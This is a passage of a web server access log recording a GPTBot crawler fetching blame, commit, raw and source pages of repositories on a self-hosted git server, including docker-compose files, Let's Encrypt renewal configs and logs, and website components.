+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12149] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10757] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" -[17/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 10144] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" -[17/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" -[17/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" -[17/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" -[17/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" -[17/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 10128] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" -[17/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 10341] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" -[17/Feb/2026:13:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:13:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:13:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:13:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10857] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" -[17/Feb/2026:13:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" [Client 74.7.227.38] [Length 10390] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13868] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:13:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51469] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11702] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42202] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11711] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39565] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42032] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44608] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11681] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" [Client 74.7.227.38] [Length 10104] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" -[17/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13653] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" -[17/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39539] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51492] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11654] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11680] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42004] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44636] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27246] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11673] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11684] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11678] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:13:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9500] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9500] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27214] [Gzip 11.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13871] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" -[17/Feb/2026:13:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10871] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 